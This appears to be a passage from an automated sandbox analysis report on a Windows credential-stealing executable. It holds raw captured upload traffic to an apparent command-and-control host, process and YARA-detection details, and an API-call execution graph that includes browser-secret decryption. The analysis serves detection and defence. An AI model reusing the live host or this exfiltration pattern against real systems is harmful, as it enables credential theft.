              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 584888
              Host: citizencenturygoodwk.shop
              2024-07-05 04:03:18 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 36 30 31 31 45 41 44 33 42 32 37 32 39 45 43 37 30 33 30 32 30 31 39 45 36 38 32 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B616011EAD3B2729EC70302019E682B3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
              2024-07-05 04:03:18 UTC | 15331 | OUT | Data Raw: 7c 3f 3f 38 bc 9d 23 50 2f f6 32 c6 5d ad 26 3a 38 c9 fc 66 79 ac b7 e9 88 27 e4 a2 ba 94 d3 e9 94 87 9c f2 11 cc 4c d8 fe 01 c5 d1 a9 0a a1 2e 62 ff f2 5b 8e 84 c2 7e b0 8f df fc 81 8c 86 c2 a6 68 1e a4 be a4 75 44 7a 5a 97 6d 1c 83 72 99 8e 2d 0a de 52 75 14 5a 3a ea 33 77 00 9c b3 c8 88 89 4a 99 96 7c 29 90 bd 92 74 c8 b8 e6 3a f3 99 27 1c d8 7b 2d fb d1 a5 36 f6 d0 b5 da 81 3a b5 96 1d 7b 92 db 09 43 dc 3a 21 01 ab d2 38 e1 2c e7 79 ae 3f d2 8c 4b 01 43 1d f4 44 5e d5 a7 57 aa c7 6f b9 a5 a5 4b 84 91 e5 cf 8c d5 31 4e 8a 20 cf db 27 c7 83 00 45 44 af 6b af 0f 3d 6f 41 0b 68 1c 01 01 98 fa 8d c3 34 4f 1e 30 fd 5d 13 24 2d d5 ce 47 ee b4 7f 4c 9e 81 68 9f 0d 56 2e b2 1d 5e f3 ad 94 bc 1c ae 14 0d fb 07 19 62 45 64 f9 51 a0 9a cd 41 cf a5 d5 69 97 db 89
              Data Ascii: |??8#P/2]&:8fy'L.b[~huDzZmr-RuZ:3wJ|)t:'{-6:{C:!8,y?KCD^WoK1N 'EDk=oAh4O0]$-GLhV.^bEdQAi
              2024-07-05 04:03:18 UTC | 15331 | OUT | Data Raw: 23 ff e6 00 97 dd 1e b5 56 ae e1 15 f7 9a 2c 6d 09 c5 f5 5b 30 74 af da 87 ee 25 44 7b 52 58 c2 9b 9a 53 39 87 6a eb 18 03 3f fa d5 e9 75 02 f6 03 1b a3 2b 1f 16 6b 55 b7 08 a8 cf 5a 9c 19 89 46 07 af 3e ac e3 c6 1a 5b bf 47 56 b7 22 0d 97 54 60 29 7e 87 95 ae 9b 7f 5b 39 bc 84 ea 14 34 ef b4 e4 41 dc 79 5e f9 eb e9 c5 e1 fc e5 ed 84 e0 99 71 8b e1 e1 2d 3e 43 01 ae 7d 9a 90 5c 9a fb ab af dc 67 42 9d e7 7b 19 08 1f 33 a0 bb d1 b7 4e 18 09 d7 b4 1d 7d 2f ab f3 cb 9f d5 54 16 58 2d dd ff f2 73 e6 9e 96 9c 75 eb 90 b6 58 6f 87 29 09 d5 9a 77 4b ec e0 3b 0f fa b6 96 ac f2 9d a5 e1 11 3e f5 43 01 ed 8e 7e ef 83 e7 7c d3 03 96 59 0d 2e 65 df 89 db 69 43 7a 1e 57 14 40 d8 7c e3 36 3f 75 8c 63 d2 5a 7e a1 7a 53 80 be 30 57 3a fc 5a 65 0d ac 64 4e 1b ed af 1e 8c
              Data Ascii: #V,m[0t%D{RXS9j?u+kUZF>[GV"T`)~[94Ay^q->C}\gB{3N}/TX-suXo)wK;>C~|Y.eiCzW@|6?ucZ~zS0W:ZedN
              2024-07-05 04:03:18 UTC | 15331 | OUT | Data Raw: 89 7c f0 81 58 68 a7 7a 9b f5 31 6d 07 5a 32 83 16 d5 fb e1 b6 d7 d2 f8 5b f5 c3 0d ab 6f 00 86 e3 c2 4d 22 34 ba 17 ee 3c 4e c6 ae 73 9b a2 9a ee 5e 7c 03 df f9 32 18 4a 1e 23 12 2f ca 83 0b e8 01 19 08 de 11 8f bf 29 19 db fa 8c 1c 3f eb 01 ca 35 31 e5 b7 da 34 79 c5 80 00 f4 e3 69 c9 53 50 f2 a9 17 a7 90 b4 c2 86 49 ee db a0 fc c4 83 8d 4b b4 af dc 5d 8c 9d a2 e5 0d 2b a1 2f 53 1f 28 af 92 6f fa 3b ac c7 1d b6 34 6b 7f 47 01 64 27 21 23 d3 83 15 6e 7b 6b 98 60 fa ce 55 ae 98 90 0d 70 ab 92 aa c1 d7 77 e8 25 b5 e1 ed 94 88 df ae 82 e6 c1 c4 c7 84 d0 5d ac 16 3d d2 df 93 59 90 58 f8 7f 4d 08 00 84 f3 5a 79 c1 52 95 33 bc 53 a0 64 15 58 6b d8 cd ae 4c 0a f1 32 08 b9 31 53 cd 01 92 07 c5 9a d3 f5 f0 b9 31 56 31 8d 03 63 b2 42 55 34 1d be e5 3b 8a 04 13 3a
              Data Ascii: |Xhz1mZ2[oM"4<Ns^|2J#/)?514yiSPIK]+/S(o;4kGd'!#n{k`Upw%]=YXMZyR3SdXkL21S1V1cBU4;:
              2024-07-05 04:03:18 UTC15331OUTData Raw: a1 2a a6 f8 c2 f7 de 42 7d e0 9f 46 f5 9a 41 b6 3e 26 ca ab ec fb 3b 40 6b 18 16 19 36 eb f7 db bd 32 01 09 2e fc b2 b9 27 05 6a 09 0d cd 15 97 28 22 3b d7 4e 9f 5d 3c 76 26 20 7d c9 af a7 f1 a7 43 cf 7b 16 fe 8c db 23 32 6e 51 e0 5f 3b bf ae 5d 35 5e f3 30 b2 6b c6 ff cd 71 fa 2f 02 ff 6f 8e 6c 19 24 ef 26 77 7d 17 26 ed 0a 2d c7 ca 02 05 d2 c9 54 28 79 6a 40 1e 88 6f 2c 8f b4 60 3b 21 07 ee 8d 3a cc 1b 1e 60 a6 fd d8 22 1d b4 ea f4 3c c0 e7 03 b9 e4 c5 97 f7 da 05 d8 a1 8a f4 c6 1d 96 6d 73 a6 b7 bd 9f 20 50 4e c8 bc 3d 14 ec 23 92 97 aa 1d 0a ec df fe 5a a3 a3 40 7a d7 aa 06 07 13 02 71 73 bc 7d 15 a4 8c 51 8a 49 de b8 ce 9f 54 0b 91 da 98 31 c3 2d 4a 6b 65 2e b6 1f 74 b3 32 ff f2 28 3a 74 40 a6 ac e0 4c dc 77 f7 12 8d 11 8f 79 c7 82 ba 70 0a aa 3c 48
              Data Ascii: *B}FA>&;@k62.'j(";N]<v& }C{#2nQ_;]5^0kq/ol$&w}&-T(yj@o,`;!:`"<ms PN=#Z@zqs}QIT1-Jke.t2(:t@Lwyp<H
              2024-07-05 04:03:18 UTC15331OUTData Raw: d1 8a 8b a4 f8 3d 43 8c cc 4f c5 dd 95 7e 65 48 e5 9d 89 ab 2f f7 ed 62 0b b9 8b 19 7b bc 33 f8 60 15 a3 75 29 49 cc 4f 63 08 9d 7a 78 b2 ea 47 c7 98 b0 d7 62 a1 11 6c b4 6f 6c ae b8 de 48 6d 8b 72 45 a9 fb 89 9b 72 0d 80 cb 09 21 53 7b 30 2b 13 88 97 7e 94 9b 4b 66 0a 88 eb 67 12 42 d7 a2 85 af 5e e5 8f 93 83 15 64 c6 c5 e2 69 5b 20 32 71 f3 ed c1 a6 67 d7 b0 87 d4 89 86 1e 6e e8 eb 05 b6 2e 4a 44 17 2e 86 fc 14 b4 ac b7 75 b2 e0 4a 37 1a fc ec b2 90 ca eb 89 89 e0 63 4d b0 8a e7 88 49 38 8f 45 0b 2c b0 5b 57 2c e2 dd 50 6d e4 6f 5d d4 2e 34 0e 60 0f 87 64 48 f7 8e ed 79 b0 e6 5c 6f 8c 30 3e 26 1b 3a 89 3d 47 3c 06 e7 b5 ed 90 f8 c7 fc e4 44 ee bb fa de 69 fc 8b f2 35 ec 44 49 63 f4 f2 a6 e9 69 e2 9c 4d f3 f3 58 d8 7d eb d5 27 4b 3a f8 69 d4 a2 17 dd 0d
              Data Ascii: =CO~eH/b{3`u)IOczxGblolHmrEr!S{0+~KfgB^di[ 2qgn.JD.uJ7cMI8E,[W,Pmo].4`dHy\o0>&:=G<Di5DIciMX}'K:i
              2024-07-05 04:03:18 UTC15331OUTData Raw: 95 57 cc f6 54 c1 66 67 35 45 85 6b 53 c4 92 29 62 31 5a 2e 5e 82 57 cd 28 03 39 ef 49 d3 ac 51 3f ff 95 bf 3f 36 96 8f 2a b9 3b 9e a6 6f 0e cb fd 6c 72 56 63 2f a0 f1 d7 0e 68 d2 68 a9 00 df c7 55 1c 1a 35 73 a1 1d 8a 4e ba 45 17 15 9f 48 ce fe 2e 6e e6 92 fd 8d b5 8f a1 e3 ac d0 e9 12 d9 9c 29 3a c7 f8 ed 60 89 8e 2f 47 6d 48 7b 1c e0 fd d9 46 29 47 6e b0 46 64 05 19 eb df 26 d5 f9 1c 10 44 88 8b 3b 7a b5 19 1f c9 5b 4f 7d d1 c0 ad ff 56 3e f2 24 d3 1c ba 7c 31 6f f5 6f 91 93 4e 21 d8 16 19 8e 48 aa ad ba b9 ea 71 3e e3 b5 3d 57 14 df a4 bb 6a 66 3c 9c 20 0d 8e 1c 3c 5d 95 77 66 df c8 dd 23 8f e4 57 8f ee 54 dd e1 f2 49 93 94 15 da 66 d8 18 bb be c7 97 8b bb e5 05 c2 1a e4 87 51 05 3f 7e 67 44 46 3d d1 d5 90 8f 92 60 fc b8 35 f0 43 fc 9c 4f 9a 2c af b7
              Data Ascii: WTfg5EkS)b1Z.^W(9IQ??6*;olrVc/hhU5sNEH.n):`/GmH{F)GnFd&D;z[O}V>$|1ooN!Hq>=Wjf< <]wf#WTIfQ?~gDF=`5CO,
              2024-07-05 04:03:18 UTC15331OUTData Raw: 39 df 7a af 7f db bc 3f bb 69 25 4c 59 79 fb d1 bc 48 9a f9 c2 5c a6 b7 11 f1 ac fc 1f 78 7c 92 4d 6e 81 0f 4c 60 c1 b8 21 b2 72 be c5 96 a1 44 c6 f7 43 d6 9b bb 78 9c 10 1f 9a 42 40 33 01 ce c8 43 39 f1 56 42 7f 30 1e 6f b6 3c dc de b5 96 78 45 78 21 e7 f5 da c4 5c 57 d0 b1 f3 0f 6d 77 b2 ee bf 67 3d 17 97 b5 6e 3e 22 2c 6e 07 cc 31 17 85 8d 06 c4 7c f2 37 e4 e6 c2 3d 9f a1 0c 7c f6 24 56 0a cf b8 9b a5 71 f7 fe 7b 66 f6 df 02 2c 00 97 34 18 97 2c 86 ae 73 37 52 cb 1f 13 97 34 cd a4 d7 97 2e 51 0b fd 42 86 e0 5c c7 bf 84 59 39 ce ae ba 43 cc e8 83 56 f9 d4 a7 81 f1 15 8d dc 8f 66 8b 93 48 a7 57 09 b5 b0 5d 4f d7 7e aa 3f 8f 6f 45 70 8d 6e be c9 75 e1 64 d7 a3 82 c9 59 30 c3 7f bd c8 f9 32 80 d2 5c 1b f1 fd 76 52 8b ad 10 31 70 89 fa f0 da 35 b6 ce 76 96
              Data Ascii: 9z?i%LYyH\x|MnL`!rDCxB@3C9VB0o<xEx!\Wmwg=n>",n1|7=|$Vq{f,4,s7R4.QB\Y9CVfHW]O~?oEpnudY02\vR1p5v
              2024-07-05 04:03:18 UTC15331OUTData Raw: 4a 24 a2 a0 32 01 80 61 67 d4 12 03 38 57 38 85 e9 a2 b1 6b 5a cf 94 15 a0 dd 24 73 86 b9 86 e0 f7 db 64 38 89 64 7c 70 e3 6d 85 a5 1a c3 1b b1 43 36 fe 41 f8 65 61 ba 1e 6c e7 e2 d0 85 41 fc 63 aa 0a 89 ff 41 04 b9 04 40 42 45 c4 6f b2 28 b3 23 b3 bd 65 bc 03 8f ce 63 51 11 b8 01 a8 0c fb ad c6 9e 22 f8 ea 98 89 55 90 20 17 b3 f9 0e 79 28 ab 72 1f cc fd 48 6a c8 ba 72 0b d7 21 86 a0 56 e3 0f bf 6d fa 7a 26 09 24 d3 b1 f0 c9 ba a2 8b e2 b1 57 78 ef 7f 34 69 ba 50 0d 3a 57 ab 89 80 d4 0c 7b f7 dd 35 81 db 0b c7 15 b8 9b 11 5e 2e 6d bd 9b 4b 01 c9 be 6e 7b cb 04 de c3 52 f7 93 2c cc 0f f2 1a 14 21 6f 21 01 a4 7a 93 c7 0b 99 e7 75 49 0c 3b 4f d8 88 7c 08 46 40 7c f4 54 5b 8c 97 85 79 09 62 af 48 fb d2 85 d3 e4 13 ab e6 5d f8 2c 86 9c a4 a4 0c 21 ce 40 76 e5
              Data Ascii: J$2ag8W8kZ$sd8d|pmC6AealAcA@BEo(#ecQ"U y(rHjr!Vmz&$Wx4iP:W{5^.mKn{R,!o!zuI;O|F@|T[ybH],!@v
              2024-07-05 04:03:18 UTC15331OUTData Raw: 2e 40 f0 43 bc 16 53 02 e9 32 5e 89 54 40 4d 45 68 76 dd 03 66 17 78 85 1b 24 0f f8 22 8d 28 78 0f ea 31 d4 03 90 1e 75 f1 06 65 0b a4 01 4e cd b8 78 33 42 04 53 ad 8c d2 4d 0b 82 2b 64 cf 43 28 21 6c 3c d2 97 bf 4e 93 a1 fc c6 7a 71 d7 8e b9 34 e2 0d 42 ba 8f 86 a9 84 d3 7d 4a d6 ae cd 4c ac 8d 78 10 16 a4 17 e8 5f e6 58 c8 5f 90 18 d7 a4 ff 5e d4 94 7c d3 f5 a4 b4 8a 73 4e 3e 4b 8f ac 3a b2 ac 29 ff eb 12 7a f0 52 97 e4 8b 43 27 ac 76 9f 97 18 7f 6b 8a 5c a7 fe 5d e1 e4 15 d8 51 b3 26 15 fc 88 ea dd e8 2a 2f 27 8a 72 66 f9 8d 32 74 05 9d a2 94 69 25 d5 9d 20 a2 5e 12 5b 5c bb 30 9c 5b 3d ae d9 3e c8 84 98 6f 04 bf 67 f9 fc 58 b1 9e ea 91 7b b1 3c 83 f6 83 fc 03 30 5c 3d 64 51 82 cb 1a 8c 61 ff 6d 6f fb f1 a5 32 99 74 03 4d eb 98 bd db 2a b2 58 a0 0f 48
              Data Ascii: .@CS2^T@MEhvfx$"(x1ueNx3BSM+dC(!l<Nzq4B}JLx_X_^|sN>K:)zRC'vk\]Q&*/'rf2ti% ^[\0[=>ogX{<0\=dQamo2tM*XH
              2024-07-05 04:03:21 UTC | 812 bytes | IN | HTTP/1.1 200 OK
              Date: Fri, 05 Jul 2024 04:03:21 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=k452lh6ii6q8nskt42k6jpljgv; expires=Mon, 28-Oct-2024 21:49:59 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6hSoUDcHVe%2BY%2Bo6YePx3XxXy2Irmhkg1wPJ5u6otiqUhawHijKjPsEB6ih%2FqwF2uJIAovqUwDegRRnUUgVEu78m0oL0zoKnRhF2fYZd114Pb0k3K1bgrJP%2BBkjc7TPqhQIzxjqK%2BmJeTScg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89e476ebd8a84237-EWR
              alt-svc: h3=":443"; ma=86400



              Target ID:0
              Start time:00:02:57
              Start date:05/07/2024
              Path:C:\Users\user\Desktop\6xmBUtHylU.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\6xmBUtHylU.exe"
              Imagebase:0x7ff67f190000
              File size:6'814'720 bytes
              MD5 hash:B82C80A3CE9B5C44391D3F11307F8B8E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Go lang
              Yara matches:
              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
              Reputation:low
              Has exited:true

              Target ID:3
              Start time:00:03:08
              Start date:05/07/2024
              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Imagebase:0x320000
              File size:231'736 bytes
              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279583257.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate
              Has exited:true


                Execution Graph

                Execution Coverage:15.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:40.6%
                Total number of Nodes:315
                Total number of Limit Nodes:11
                execution_graph 11149 262ba6 11150 262bab 11149->11150 11151 262bc3 GetUserDefaultUILanguage 11150->11151 11152 266fa4 GetLogicalDrives 11153 266fb7 11152->11153 11154 263425 11155 263445 11154->11155 11156 263480 GetVolumeInformationW 11155->11156 11429 2416e7 11430 2416f4 11429->11430 11433 245fa0 11430->11433 11432 241707 11434 245fc0 11433->11434 11435 26a5b0 LdrInitializeThunk 11434->11435 11436 246178 11435->11436 11437 246197 11436->11437 11438 26a940 LdrInitializeThunk 11436->11438 11442 24643e 11436->11442 11443 2461c2 11436->11443 11439 26aa50 LdrInitializeThunk 11437->11439 11437->11442 11437->11443 11438->11437 11439->11443 11440 246cb8 11447 267840 LdrInitializeThunk 11440->11447 11445 26a5b0 LdrInitializeThunk 11442->11445 11443->11440 11443->11442 11444 246cc7 11446 2465fa 11445->11446 11446->11432 11447->11444 11448 24d9e0 11449 24da3f 11448->11449 11450 24d9ec 11448->11450 11451 24b540 LdrInitializeThunk 11450->11451 11451->11449 11157 25ab20 11159 25ab25 11157->11159 11158 25ac06 SysAllocString 11160 25ac67 11158->11160 11159->11158 11159->11159 11161 248da2 11162 248da7 11161->11162 11162->11162 11175 245c00 11162->11175 11164 248fbc 11165 245c00 LdrInitializeThunk 11164->11165 11166 2490bc 11165->11166 11167 245c00 LdrInitializeThunk 11166->11167 11168 2491e1 11167->11168 11169 245c00 LdrInitializeThunk 11168->11169 11170 249308 11169->11170 11171 245c00 LdrInitializeThunk 11170->11171 11172 24940a 11171->11172 11173 245c00 LdrInitializeThunk 11172->11173 11174 24953f 11173->11174 11176 245c20 11175->11176 11176->11176 11187 26a5b0 11176->11187 11178 245cfa 11179 245d14 11178->11179 11180 245d32 11178->11180 11183 245d5c 11178->11183 11186 245d0d 11178->11186 11198 26a940 11179->11198 11180->11183 11180->11186 11191 26aa50 11180->11191 11183->11186 11197 267840 LdrInitializeThunk 11183->11197 11185 245f93 11186->11164 11186->11186 11189 26a5d0 11187->11189 11188 26a72e 11188->11178 11189->11188 11202 267840 LdrInitializeThunk 
11189->11202 11193 26aa82 11191->11193 11192 26abfe 11192->11183 11195 26ab0e 11193->11195 11203 267840 LdrInitializeThunk 11193->11203 11195->11192 11204 267840 LdrInitializeThunk 11195->11204 11197->11185 11200 26a974 11198->11200 11199 26a9fe 11199->11186 11200->11199 11205 267840 LdrInitializeThunk 11200->11205 11202->11188 11203->11195 11204->11192 11205->11199 11206 2577ae 11208 2577e7 11206->11208 11207 25794e 11208->11207 11210 267840 LdrInitializeThunk 11208->11210 11210->11207 11211 23fe2f 11214 25e680 11211->11214 11215 25e6b6 KiUserCallbackDispatcher GetSystemMetrics 11214->11215 11216 25e6ff DeleteObject 11215->11216 11218 25e75e SelectObject 11216->11218 11220 25e7fa SelectObject 11218->11220 11221 25e823 DeleteObject 11220->11221 11223 254828 11224 254840 11223->11224 11224->11224 11225 26a5b0 LdrInitializeThunk 11224->11225 11226 254a2a 11225->11226 11227 26a5b0 LdrInitializeThunk 11226->11227 11228 254c2a 11227->11228 11229 24662a 11235 246629 11229->11235 11230 26a940 LdrInitializeThunk 11230->11235 11231 246789 11233 26aa50 LdrInitializeThunk 11233->11235 11234 246798 11238 24684e 11234->11238 11240 267840 LdrInitializeThunk 11234->11240 11235->11229 11235->11230 11235->11231 11235->11233 11235->11234 11245 231df0 11235->11245 11237 246955 11237->11237 11238->11237 11238->11238 11241 26a780 11238->11241 11240->11238 11242 26a7a0 11241->11242 11242->11242 11243 26a8ee 11242->11243 11250 267840 LdrInitializeThunk 11242->11250 11243->11238 11246 231e1c 11245->11246 11248 231df8 11245->11248 11246->11235 11251 231e20 11248->11251 11249 231e1b 11249->11235 11250->11243 11252 231e35 11251->11252 11259 231e7d 11251->11259 11253 231fe7 11252->11253 11258 232035 11252->11258 11252->11259 11260 23210f 11252->11260 11261 232ef0 11253->11261 11255 232ef0 RtlAllocateHeap 11255->11260 11256 231e20 RtlAllocateHeap 11256->11258 11257 231e20 RtlAllocateHeap 11257->11260 11258->11256 11258->11259 11259->11249 11260->11255 11260->11257 11260->11259 11262 232f04 
11261->11262 11263 232f4f 11261->11263 11262->11263 11265 265512 RtlAllocateHeap 11262->11265 11263->11259 11452 2391f0 11454 2391f9 11452->11454 11453 23924d ExitProcess 11456 23920a 11454->11456 11458 23a310 11454->11458 11456->11453 11457 239220 11456->11457 11457->11453 11459 23a3b5 11458->11459 11460 23a40e LoadLibraryExW 11458->11460 11459->11460 11461 23a448 11460->11461 11461->11456 11270 250fbc 11271 251141 11270->11271 11282 26ae40 11271->11282 11274 251310 11292 26b930 11274->11292 11276 26ae40 LdrInitializeThunk 11278 2511df 11276->11278 11278->11274 11278->11276 11279 2512d1 11278->11279 11281 267840 LdrInitializeThunk 11278->11281 11286 26af90 11278->11286 11281->11278 11283 26ae60 11282->11283 11283->11283 11284 2511b3 11283->11284 11304 267840 LdrInitializeThunk 11283->11304 11284->11274 11284->11278 11284->11279 11298 26b270 11284->11298 11287 26afc2 11286->11287 11289 26b03e 11287->11289 11305 267840 LdrInitializeThunk 11287->11305 11291 26b12e 11289->11291 11306 267840 LdrInitializeThunk 11289->11306 11291->11278 11291->11291 11293 26b950 11292->11293 11295 26ba0e 11293->11295 11307 267840 LdrInitializeThunk 11293->11307 11297 26bb0e 11295->11297 11308 267840 LdrInitializeThunk 11295->11308 11297->11279 11299 26b2a4 11298->11299 11301 26b338 11299->11301 11309 267840 LdrInitializeThunk 11299->11309 11303 26b42e 11301->11303 11310 267840 LdrInitializeThunk 11301->11310 11303->11278 11303->11303 11304->11284 11305->11289 11306->11291 11307->11295 11308->11297 11309->11301 11310->11303 11462 24c67d 11463 24c68b 11462->11463 11467 24d600 11463->11467 11479 250bd0 11463->11479 11464 24c6f6 11468 24d6c0 11467->11468 11469 24d616 11467->11469 11468->11464 11469->11468 11469->11469 11470 26a5b0 LdrInitializeThunk 11469->11470 11471 24d79d 11470->11471 11472 263660 LdrInitializeThunk 11471->11472 11475 24d7da 11471->11475 11473 24d7bf 11472->11473 11473->11468 11474 26a5b0 LdrInitializeThunk 11473->11474 11474->11475 11475->11468 11476 26aa50 
LdrInitializeThunk 11475->11476 11477 24d7fc 11476->11477 11477->11468 11483 267840 LdrInitializeThunk 11477->11483 11480 250be9 11479->11480 11482 250d40 11479->11482 11480->11480 11481 24b540 LdrInitializeThunk 11480->11481 11481->11482 11482->11464 11483->11468 11311 2683bc 11312 268400 11311->11312 11313 26848e 11312->11313 11317 267840 LdrInitializeThunk 11312->11317 11316 267840 LdrInitializeThunk 11313->11316 11316->11313 11317->11313 11484 24f2fa 11486 24f2d0 11484->11486 11485 26af90 LdrInitializeThunk 11485->11486 11486->11484 11486->11485 11487 24f353 11486->11487 11489 24f365 11486->11489 11488 26ae40 LdrInitializeThunk 11487->11488 11488->11489 11489->11489 11318 268106 11319 268167 11318->11319 11320 26830e 11319->11320 11322 267840 LdrInitializeThunk 11319->11322 11322->11320 11490 267bc4 11491 267bf8 11490->11491 11493 267c98 11491->11493 11496 267840 LdrInitializeThunk 11491->11496 11492 267d7e 11493->11492 11497 267840 LdrInitializeThunk 11493->11497 11496->11493 11497->11492 11323 243187 11324 243190 11323->11324 11324->11324 11327 24b540 11324->11327 11328 24b5c0 11327->11328 11331 24ba00 11328->11331 11332 26a5b0 LdrInitializeThunk 11331->11332 11333 24ba59 11332->11333 11334 242687 11335 242690 11334->11335 11338 2486e0 11335->11338 11337 2426a7 11339 248700 11338->11339 11340 26a780 LdrInitializeThunk 11339->11340 11343 24875f 11340->11343 11341 24876e 11341->11337 11342 24885e 11345 24ba00 LdrInitializeThunk 11342->11345 11343->11341 11343->11342 11343->11343 11344 24ba00 LdrInitializeThunk 11343->11344 11344->11342 11345->11342 11346 24ff00 11347 26ae40 LdrInitializeThunk 11346->11347 11348 24ff23 11347->11348 11349 267502 11350 267510 11349->11350 11350->11350 11351 267560 LoadLibraryExW 11350->11351 11351->11350 11352 24ae80 11353 24ae8e 11352->11353 11355 24aed0 11352->11355 11356 24af90 11353->11356 11357 24afe8 11356->11357 11357->11357 11358 26a780 LdrInitializeThunk 11357->11358 11359 24b0ed 11358->11359 11359->11355 11498 23fbc4 
11499 23fbfd 11498->11499 11510 24e880 11499->11510 11501 23fd3e 11520 24f060 11501->11520 11503 23fd5e 11504 251910 LdrInitializeThunk 11503->11504 11505 23fda7 11504->11505 11506 251dc0 LdrInitializeThunk 11505->11506 11507 23fdb0 11506->11507 11508 25e4a0 6 API calls 11507->11508 11509 23fdf9 11508->11509 11511 24e8f3 11510->11511 11512 26a780 LdrInitializeThunk 11511->11512 11517 24eb17 11512->11517 11513 24ed04 11514 24ba00 LdrInitializeThunk 11513->11514 11515 24ee4f 11513->11515 11519 24f003 11513->11519 11514->11515 11515->11515 11516 24b540 LdrInitializeThunk 11515->11516 11516->11519 11517->11513 11517->11515 11518 26a780 LdrInitializeThunk 11517->11518 11518->11513 11519->11501 11521 24f110 11520->11521 11521->11521 11522 2486e0 LdrInitializeThunk 11521->11522 11523 24f272 11522->11523 11364 248088 11365 248128 11364->11365 11366 24b540 LdrInitializeThunk 11365->11366 11367 248530 11366->11367 11524 258c4b 11530 2699c0 11524->11530 11526 258c5b GetComputerNameExA 11527 258cae 11526->11527 11527->11527 11528 258d83 GetComputerNameExA 11527->11528 11529 258dd1 11528->11529 11531 2699f1 11530->11531 11531->11526 11531->11531 11532 2677d6 11533 2677e3 RtlReAllocateHeap 11532->11533 11372 246790 11373 246795 11372->11373 11375 24684e 11373->11375 11378 267840 LdrInitializeThunk 11373->11378 11376 246955 11375->11376 11377 26a780 LdrInitializeThunk 11375->11377 11376->11376 11377->11375 11378->11375 11534 246cd0 11536 246ce0 11534->11536 11535 246e7e CryptUnprotectData 11537 246ea5 11535->11537 11536->11535 11537->11537 11538 24b8d1 11539 24b8d6 11538->11539 11539->11539 11540 24ba00 LdrInitializeThunk 11539->11540 11541 24b998 11540->11541 11379 24709b 11380 2470de 11379->11380 11381 245c00 LdrInitializeThunk 11380->11381 11382 247145 11381->11382 11383 245c00 LdrInitializeThunk 11382->11383 11384 247200 11383->11384 11385 245c00 LdrInitializeThunk 11384->11385 11386 247316 11385->11386 11387 245c00 